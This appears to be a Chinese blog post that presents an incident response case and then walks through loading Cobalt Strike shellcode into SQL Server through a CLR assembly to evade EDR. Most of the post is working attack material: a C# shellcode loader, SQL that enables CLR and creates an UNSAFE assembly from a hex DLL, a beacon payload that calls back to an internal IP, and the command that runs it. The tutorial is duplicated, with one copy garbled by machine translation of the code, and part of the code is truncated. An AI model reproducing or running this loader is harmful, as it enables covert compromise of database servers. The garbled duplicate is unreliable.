如何使用 MSSQL CLR 程序集绕过 EDR

目录导航

背景

前几天，我处理了一起涉及 MSSQL 数据库的勒索事件，该数据库可能逃避了 EDR 检测。我打算分享整个过程。

分析情况后，我发现根本原因是密码太弱，本质上是一种字典密码。黑客能够使用这个弱密码登录数据库，并注入他的 Cobalt Strike shellcode，从而完全控制 MSSQL Server。

什么是 CLR

CLR，微软正式称之为公共语言运行时，是 .NET Framework 的一个组件，自 SQL Server 2005 起已集成到 SQL Server 中。这意味着您现在可以使用任何 .NET Framework 语言（包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#）来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和表值函数。

编译 CLR 程序集

打开 Visual Studio 安装程序并单击modify

选择
Data Storage and Processing工具

创建新项目

我的实验环境是MSSQL 2022，相关版本和脚本创建均已正确选择

完成新项目的添加后，目前的windows服务器大多运行在64位平台上，所以这里我提供了64位平台的代码

using System;
using Microsoft.SqlServer.Server;
using System.Runtime.InteropServices;
public partial class StoredProcedures
{
    [SqlProcedure]
    public static void shellcode_loader(string sc)
    {
// Place your code
        SqlContext.Pipe.Send(shellcode_exec(sc));
    }
    public static string shellcode_exec(string sc)
    {
0x40);
byte[] sa = new byte[1000];
int shellcode_len = sc.Length / 2;
for (int i = 0; i < shellcode_len; i++)
{
    string code = "0x" + sc.Substring(i * 2, 2);
    int a = Convert.ToInt32(code, 16);
    sa[i] = (byte)a;
}
UInt64 shellcodeAddress = VirtualAlloc(0, (UInt64)sa.Length, 0x1000,
Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);
CreateThread(0, 0, shellcodeAddress, 0, 0, 0);
return "";
    }
    [DllImport("kernel32")]
    private static extern UInt64 VirtualAlloc(UInt64 lpAddress, UInt64 dwSize,
UInt64 flAllocationType, UInt64 flProtect);
    [DllImport("kernel32")]
    private static extern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32
dwStackSize, UInt64 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags,
UInt32 lpThreadId);
}

选择 Generate 来生成解决方案

我们将在 bin 目录中得到一个 SQL 文件

我们必须抽象代码片段来创建汇编

执行以下 SQL 语句

sp_configure 'clr enabled', 1
GO
RECONFIGURE
   GO
ALTER DATABASE master SET TRUSTWORTHY ON;
GO
CREATE ASSEMBLY [MSSQL_ShellCodeLoader]
    AUTHORIZATION [dbo]

       FROM
0x4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000
00000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD215468
69732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2
400000000000000504500004C010300DBD669650000000000000000E00022200B013000000A000000
060000000000005E28000000200000004000000000001000200000000200000400000000000000060
000000000000000800000000200000000000003006085000010000010000000001000001000000000
00001000000000000000000000000C2800004F00000000400000D8020000000000000000000000000
00000000000006000000C000000D42600001C00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000002000000800000000000000000000000820000
04800000000000000000000002E746578740000006408000000200000000A00000002000000000000
0000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000
000000000000000400000402E72656C6F6300000C0000000060000000020000001000000000000000
000000000000004000004200000000000000000000000000000000402800000000000048000000020
0050008210000CC050000010000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000004E00280500000A0228020000066F0
600000A002A133006008E000000010000110020E80300008D090000010A026F0700000A185B0B160D
2B2D0072010000700209185A186F0800000A280900000A130411041F10280A00000A130506091105D
29C000917580D0907FE04130611062DC9166A068E696A20001000006A1F406A28030000060C061608
280B00000A068E69280C00000A00161608161616280400000626720700007013072B0011072A22022
80D00000A002A0042534A4201000100000000000C00000076342E302E33303331390000000005006C
00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235
553001405000010000000234755494400000024050000A800000023426C6F62000000000000000200
0001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000
000040000000100000001000000020000000100000002000000000032010100000000000600B800E0
010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750
086010600F6004C0106000E014C01060080024C010600A7014C0106002A01C1010000000012000000
000001000100010010000F02000015000100010050200000000096006901530001006420000000009
60030005800020000000000800091203F005D00030000000000800091205A0065000700FE20000000
008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000
004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F00
0900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F012
600510015012A0051005C02300059000A003600610074023C006900930241002900A1010600200023
00A0002E000B006F002E00130078002E001B0097001A000100000107003F000100000109005A00010
0048000000000000000000000000000000000530100000400000000000000000000004A0027000000
00000400000000000000000000004A001B00000000000000006B65726E656C333200546F496E74333
2003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F6465
5F65786563005669727475616C416C6C6F63007363006C70546872656164496400437265617465546
8726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E54
7970650044656275676761626C654174747269627574650053716C50726F636564757265417474726
96275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E
74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B536
97A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61
727368616C004D5353514C5F5368656C6C436F64654C6F616465722E646C6C0053797374656D004D5
353514C5F5368656C6C436F64654C6F61646572007368656C6C636F64655F6C6F61646572006C7050
6172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7
200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D
652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C657
2536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573
006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646
472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C50726F74
656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000
005300078000001000000001899F70588C10A4B9408847FF516E94500042001010803200001052001
0111110400001221042001010E0B07081D05080B080E08020E032000080520020E08080500020E0E0
E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E07
00040B0B0B0B0B0900060909090B0909090801000800000000001E01000100540216577261704E6F6

   E457863657074696F6E5468726F777301080100070100000000040100000000000000000000DBD669
6500000000020000001C010000F0260000F008000052534453F44668E3C2CF6F49926FADC8983C8E9
601000000453A5C6D7373716C2D70726F6A6563745C4461746162617365335C6F626A5C4465627567
5C4D5353514C5F5368656C6C436F64654C6F616465722E70646200000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000003428000000000000000000004E280000002000
00000000000000000000000000000000000000000040280000000000000000000000005F436F72446
C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000010010000000180000800000000000000000000000000000010001000000300
00080000000000000000000000000000001000000000048000000584000007C020000000000000000
00007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000
000BD04EFFE00000100000000000000000000000000000000003F0000000000000004000000020000
00000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0
0000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004
DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B80100000
1003000300030003000300034006200300000002C0002000100460069006C00650044006500730063
00720069007000740069006F006E000000000020000000300008000100460069006C0065005600650
07200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E00
7400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006
C006C0043006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C
006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0
072006900670069006E0061006C00460069006C0065006E0061006D00650000004D00530053005100
4C005F005300680065006C006C0043006F00640065004C006F0061006400650072002E0064006C006
C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030
002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560
065007200730069006F006E00000030002E0030002E0030002E003000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000002000000C0000006038000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000
    WITH PERMISSION_SET = UNSAFE;
GO
CREATE PROCEDURE [dbo].[shellcode_loader]
@sc NVARCHAR (MAX)
AS EXTERNAL NAME [MSSQL_ShellCodeLoader].[StoredProcedures].[shellcode_loader]

编译 CLR 程序集

打开 Visual Studio 安装程序并单击modify

选择Data Storage and Processing工具

创建新项目

我的实验环境是MSSQL 2022，相关版本和脚本创建均已正确选择

完成新项目的添加后，目前的windows服务器大多运行在64位平台上，所以这里我提供了64位平台的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

使用系统；
使用 Microsoft.SqlServer.Server；
使用 System.Runtime.InteropServices；
公共部分类 StoredProcedures
{
[SqlProcedure]
公共静态 void shellcode_loader(string sc)
{
//放置您的代码
SqlContext.Pipe.Send(shellcode_exec(sc));
}
公共静态字符串 shellcode_exec(string sc)
{
0x40);
byte[] sa = new byte[1000];
int shellcode_len = sc.Length / 2;
for (int i = 0; i < shellcode_len; i++)
{
string code =“0x”+sc.Substring(i * 2, 2);
int a = Convert.ToInt32(code, 16);
sa[i] = (byte)a;
}
UInt64 shellcodeAddress = VirtualAlloc(0, (UInt64)sa.Length, 0x1000,
Marshal.Copy(sa, 0, (IntPtr)(shellcodeAddress), sa.Length);
CreateThread(0, 0, shellcodeAddress, 0, 0, 0);
返回“”;
}
[DllImport(“kernel32”)]
private static extern UInt64 VirtualAlloc(UInt64 lpAddress, UInt64 dwSize,
UInt64 flAllocationType, UInt64 flProtect);
[DllImport(“kernel32”)]
private static extern UInt32 CreateThread(UInt32 lpThreadAttributes, UInt32
dwStackSize, UInt64 lpStartAddress, UInt32 lpParameter, UInt32 dwCreationFlags,
UInt32 lpThreadId);
}

选择 Generate 来生成解决方案

我们将在 bin 目录中得到一个 SQL 文件

我们必须抽象代码片段来创建汇编

执行以下 SQL 语句

sp_configure 'clr enabled', 1
GO
RECONFIGURE
   GO
ALTER DATABASE master SET TRUSTWORTHY ON;
GO
CREATE ASSEMBLY [MSSQL_ShellCodeLoader]
    AUTHORIZATION [dbo]

       FROM
0x4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000
00000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD215468
69732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2
400000000000000504500004C010300DBD669650000000000000000E00022200B013000000A000000
060000000000005E28000000200000004000000000001000200000000200000400000000000000060
000000000000000800000000200000000000003006085000010000010000000001000001000000000
00001000000000000000000000000C2800004F00000000400000D8020000000000000000000000000
00000000000006000000C000000D42600001C00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000002000000800000000000000000000000820000
04800000000000000000000002E746578740000006408000000200000000A00000002000000000000
0000000000000000200000602E72737263000000D80200000040000000040000000C0000000000000
000000000000000400000402E72656C6F6300000C0000000060000000020000001000000000000000
000000000000004000004200000000000000000000000000000000402800000000000048000000020
0050008210000CC050000010000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000004E00280500000A0228020000066F0
600000A002A133006008E000000010000110020E80300008D090000010A026F0700000A185B0B160D
2B2D0072010000700209185A186F0800000A280900000A130411041F10280A00000A130506091105D
29C000917580D0907FE04130611062DC9166A068E696A20001000006A1F406A28030000060C061608
280B00000A068E69280C00000A00161608161616280400000626720700007013072B0011072A22022
80D00000A002A0042534A4201000100000000000C00000076342E302E33303331390000000005006C
00000004020000237E0000700200009802000023537472696E677300000000080500000C000000235
553001405000010000000234755494400000024050000A800000023426C6F62000000000000000200
0001471502140900000000FA013300160000010000000D00000002000000050000000C0000000D000
000040000000100000001000000020000000100000002000000000032010100000000000600B800E0
010600D800E00106008E00AE010F0000020000060063024C010A00A20086010A00880286010A00750
086010600F6004C0106000E014C01060080024C010600A7014C0106002A01C1010000000012000000
000001000100010010000F02000015000100010050200000000096006901530001006420000000009
60030005800020000000000800091203F005D00030000000000800091205A0065000700FE20000000
008618A10106000D00000001004C00000001004C00000001004302000002000701000003007D00000
004006A0200000100200200000200FB00000003004D02000004007A01000005003302000006004F00
0900A10101001100A10106001900A1010A003100A101060039006C00100041006700150051001F012
600510015012A0051005C02300059000A003600610074023C006900930241002900A1010600200023
00A0002E000B006F002E00130078002E001B0097001A000100000107003F000100000109005A00010
0048000000000000000000000000000000000530100000400000000000000000000004A0027000000
00000400000000000000000000004A001B00000000000000006B65726E656C333200546F496E74333
2003C4D6F64756C653E0053797374656D2E44617461006D73636F726C6962007368656C6C636F6465
5F65786563005669727475616C416C6C6F63007363006C70546872656164496400437265617465546
8726561640053656E64006765745F506970650053716C5069706500666C416C6C6F636174696F6E54
7970650044656275676761626C654174747269627574650053716C50726F636564757265417474726
96275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E
74696D65436F6D7061746962696C6974794174747269627574650042797465006477537461636B536
97A6500647753697A6500537472696E6700537562737472696E67006765745F4C656E677468004D61
727368616C004D5353514C5F5368656C6C436F64654C6F616465722E646C6C0053797374656D004D5
353514C5F5368656C6C436F64654C6F61646572007368656C6C636F64655F6C6F61646572006C7050
6172616D65746572004D6963726F736F66742E53716C5365727665722E536572766572002E63746F7
200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D
652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C657
2536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573
006C70546872656164417474726962757465730064774372656174696F6E466C616773006C7041646
472657373006C7053746172744164647265737300436F6E636174004F626A65637400666C50726F74
656374006F705F4578706C6963697400436F6E766572740053716C436F6E7465787400436F7079000
005300078000001000000001899F70588C10A4B9408847FF516E94500042001010803200001052001
0111110400001221042001010E0B07081D05080B080E08020E032000080520020E08080500020E0E0
E050002080E08040001180A080004011D0508180808B77A5C561934E089040001010E0400010E0E07
00040B0B0B0B0B0900060909090B0909090801000800000000001E01000100540216577261704E6F6

   E457863657074696F6E5468726F777301080100070100000000040100000000000000000000DBD669
6500000000020000001C010000F0260000F008000052534453F44668E3C2CF6F49926FADC8983C8E9
601000000453A5C6D7373716C2D70726F6A6563745C4461746162617365335C6F626A5C4465627567
5C4D5353514C5F5368656C6C436F64654C6F616465722E70646200000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000003428000000000000000000004E280000002000
00000000000000000000000000000000000000000040280000000000000000000000005F436F72446
C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000010010000000180000800000000000000000000000000000010001000000300
00080000000000000000000000000000001000000000048000000584000007C020000000000000000
00007C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000
000BD04EFFE00000100000000000000000000000000000000003F0000000000000004000000020000
00000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0
0000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004
DC010000010053007400720069006E006700460069006C00650049006E0066006F000000B80100000
1003000300030003000300034006200300000002C0002000100460069006C00650044006500730063
00720069007000740069006F006E000000000020000000300008000100460069006C0065005600650
07200730069006F006E000000000030002E0030002E0030002E003000000054001A00010049006E00
7400650072006E0061006C004E0061006D00650000004D005300530051004C005F005300680065006
C006C0043006F00640065004C006F0061006400650072002E0064006C006C0000002800020001004C
006500670061006C0043006F0070007900720069006700680074000000200000005C001A0001004F0
072006900670069006E0061006C00460069006C0065006E0061006D00650000004D00530053005100
4C005F005300680065006C006C0043006F00640065004C006F0061006400650072002E0064006C006
C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030
002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560
065007200730069006F006E00000030002E0030002E0030002E003000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000002000000C0000006038000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000
    WITH PERMISSION_SET = UNSAFE;
GO
CREATE PROCEDURE [dbo].[shellcode_loader]
@sc NVARCHAR (MAX)
AS EXTERNAL NAME [MSSQL_ShellCodeLoader].[StoredProcedures].[shellcode_loader]

创建存储过程
打开MSSQL的CRL功能然后创建存储过程

在 Cobalt Strike 中使用 C 编程语言生成 shellcode

使用Python脚本转换ShellCode的格式

def hex_convert():
   byte_sequence =
b'\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd
2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7
\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\
x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x
18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8
b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01
\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\
x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x
0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5
e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a
\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\
x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x
48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd
5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x4b\x1f\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a
\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\
x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\x
ff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc
0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f
\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\
x00\xe8\xa2\xff\xff\xff\x2f\x52\x4e\x50\x6d\x00\xa4\xc1\x12\x2f\x52\x7f\xda\xdb\x
19\x11\x20\x16\x2f\x85\xc8\x97\x87\xd4\xc7\xfc\x3f\x20\xb2\xc9\xed\x23\x14\x12\x0
2\x8c\x22\xcb\x04\x9c\xd3\x02\x2c\x42\x0e\xf2\xb6\x17\x2a\x11\x9d\x7b\x2e\xe0\x1b
\x52\x05\xc6\x53\x86\xca\x1e\xb6\x2c\xa0\xb2\x3d\x13\x89\x5e\x93\xf1\x03\x3b\xa5\
xf9\xce\xa4\xc8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x
69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3
b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e
\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\
x74\x2f\x35\x2e\x30\x3b\x20\x4d\x41\x54\x50\x3b\x20\x4d\x41\x54\x50\x29\x0d\x0a\x
00\x90\x43\x13\x5b\x13\x34\x7d\x9f\x7e\x65\x68\x85\xfa\x95\xa8\xb8\xfc\x36\xec\x7
5\x24\x1d\x8f\xc5\xa4\xc7\x06\x55\x35\xf6\x14\x82\x31\x46\x25\x94\x14\x70\x7e\x49
\x9c\x0b\x3e\xef\x29\x03\xcc\x77\x72\x23\xdc\xf9\x9d\x8e\x93\x6a\xef\x36\x76\xa3\
x63\x60\xe8\x60\xb6\x8f\x08\x48\xb4\x0c\xa5\x03\x44\x0a\x4c\xb1\x36\x99\xe6\xe0\x
3c\xc7\xcc\x05\x74\x18\x49\x1a\x61\x39\xd9\x58\xe0\xbd\xdd\x74\x3a\x24\xe6\x91\xa
4\xfd\x70\xcc\xd2\xcf\x20\x76\x63\x47\xe1\x5b\x32\x34\x87\x05\x13\x6e\x4d\xd7\x21
\x29\xdc\xf6\x5b\x4a\x05\x72\xdf\xfb\xe7\xd6\x27\x04\x6a\x18\xc8\x8d\x55\x49\x43\
xae\xe8\x46\x85\x35\x43\x0a\x1f\x83\x04\x20\xba\x10\x97\xe4\x36\x3a\x0a\xac\x77\x
07\x42\x86\x17\x73\x53\x73\x3f\x0e\x0b\x5a\xd0\x6a\x03\xd6\x39\x59\xaf\x8f\xa1\x5
1\xa3\xb8\x45\xa1\x82\x26\x0e\x9d\xa7\x01\xe7\x76\x5e\x42\xb9\x4b\x14\x4c\xc8\x27
\xec\x8b\x7a\x58\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\
x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\x
d5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x4
9\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b
\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\
x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x33\x2e\x31\x33\x30\x00\x3a\xde\x
68\xb1'
   convert_string = ''.join(format(byte, '02x') for byte in byte_sequence)
   print(convert_string)
if __name__ == '__main__':
    hex_convert()

加载并执行ShellCode

exec shellcode_loader
'fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb7
4a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d06681781
80b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801
d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0
c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a
488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94
831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b84b1f00004d31c9415141516a
03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bf
fd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f
859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f524e506d00a4c1122f527fdadb1
91120162f85c89787d4c7fc3f20b2c9ed231412028c22cb049cd3022c420ef2b6172a119d7b2ee01b
5205c65386ca1eb62ca0b23d13895e93f1033ba5f9cea4c800557365722d4167656e743a204d6f7a6
96c6c612f352e302028636f6d70617469626c653b204d53494520392e303b2057696e646f7773204e
5420362e313b20574f5736343b2054726964656e742f352e303b204d4154503b204d415450290d0a0
09043135b13347d9f7e656885fa95a8b8fc36ec75241d8fc5a4c7065535f614823146259414707e49
9c0b3eef2903cc777223dcf99d8e936aef3676a36360e860b68f0848b40ca503440a4cb13699e6e03
cc7cc057418491a6139d958e0bddd743a24e691a4fd70ccd2cf20766347e15b32348705136e4dd721
29dcf65b4a0572dffbe7d627046a18c88d554943aee8468535430a1f830420ba1097e4363a0aac770
74286177353733f0e0b5ad06a03d63959af8fa151a3b845a182260e9da701e7765e42b94b144cc827
ec8b7a580041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd
5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b
074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e332e313330003ade6
8b1'

MSSQL 监听成功，EDR 未发现任何异常行为

from

背景

什么是 CLR

编译 CLR 程序集

编译 CLR 程序集

Leave a Reply 取消回复